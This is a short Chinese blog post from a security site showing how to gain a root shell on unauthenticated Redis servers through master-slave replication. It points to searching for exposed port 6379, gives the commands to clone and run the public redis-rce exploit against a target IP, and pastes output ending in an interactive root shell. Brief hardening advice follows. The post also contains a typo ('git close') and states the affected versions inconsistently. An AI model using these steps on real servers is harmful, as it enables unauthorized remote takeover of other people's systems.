登陆 注册

Redis未授权通过主从复制 GetShell[Exp]

Lzers 2019-07-10 Redisgetshellexp
黑白网(heibai.org)成立于2014年,多年来以其专业的视角,优质的服务为广大安全技术爱好者提供了目前国内最全的网络安全技术学习资料,普及中国网络安全知识,宣扬正确的黑客极客文化,全方面提高国内安全技术水平。

脆弱目标查询

漏洞关键词redis 默认端口6379,影响版本 4.x/5.x

QQ图片20190710222450.png

Exp利用

攻击机Ubuntu,ip地址192.168.1.107,下载exp脚本,然后输入参数开始。

git close https://github.com/Ridter/redis-rce
 cd redis-rce
 greekn@greekn:~/redis-rce$ python3 redis-rce.py -r 192.168.1.16 -L 192.168.1.107 -f exp_lin.so
 
 █▄▄▄▄ ▄███▄   ██▄   ▄█    ▄▄▄▄▄       █▄▄▄▄ ▄█▄    ▄███▄   
 █  ▄▀ █▀   ▀  █  █  ██   █     ▀▄     █  ▄▀ █▀ ▀▄  █▀   ▀  
 █▀▀▌  ██▄▄    █   █ ██ ▄  ▀▀▀▀▄       █▀▀▌  █   ▀  ██▄▄    
 █  █  █▄   ▄▀ █  █  ▐█  ▀▄▄▄▄▀        █  █  █▄  ▄▀ █▄   ▄▀ 
   █   ▀███▀   ███▀   ▐                  █   ▀███▀  ▀███▀   
 ▀                                     ▀                   
[*] Connecting to  192.168.1.16:6379...
[*] Sending SLAVEOF command to server
[+] Accepted connection from 192.168.1.16:6379
[*] Setting filename
[+] Accepted connection from 192.168.1.16:6379
[*] Start listening on 192.168.1.107:21000
[*] Tring to run payload
[+] Accepted connection from 192.168.1.16:38875
[*] Closing rogue server...
[+] What do u want ? [i]nteractive shell or [r]everse shell: i
[+] Interactive shell open , use "exit" to exit...
$ whoami
root
$

本次受影响版本

Redis 2.x 3.x 4.x 5.x

修复建议

禁止外部访问redis服务端口

禁止root权限启动redis服务

限制链接redis服务的IP

生成海报
请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By HeiBaiTeam.